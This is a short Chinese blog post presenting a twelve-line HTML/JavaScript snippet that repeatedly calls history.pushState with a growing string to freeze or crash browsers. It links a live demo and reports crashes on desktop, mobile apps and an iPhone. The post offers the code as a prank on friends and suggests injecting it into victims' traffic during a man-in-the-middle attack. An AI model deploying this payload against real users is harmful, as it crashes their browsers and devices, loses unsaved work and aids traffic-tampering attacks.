• 欢迎访问小辉博客,有访必回!广告为已更换为百度联盟,希望随手点下,虽然博客是兴趣所在,但也想有一个良性循环!请大家谅解!

这十二行代码是如何让浏览器爆炸的?(可以整蛊下你的好友)

未分类 小辉 341次浏览 已收录 0个评论 扫描二维码

<html><body><script>var total="";for (var i=0;i<1000000;i++){    total= total+i.toString();    history.pushState(0,0,total);}</script></body></html>

demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

http://www.0xroot.cn/demo.html

接来下会发生什么?

点开以后,我的状态是这样的:



如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!

如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让iPhone重启,这一现象倒是没有出现。22:49 修正:iPhone用Safari打开之后链接之后,手机注销重启了!…

思考

这是Bug还是0day?为什么会有这一现象?如何实现的?

有哪些比较有意思的利用姿势?(我先来个:当在执行MITM中间人攻击的时候,可以注入这一段js,来个恶搞整蛊。然后都懂的…)


小辉博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明这十二行代码是如何让浏览器爆炸的?(可以整蛊下你的好友)

喜欢 (0)
[cnbzzh@qq.com]
分享 (0)
小辉
关于作者:
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址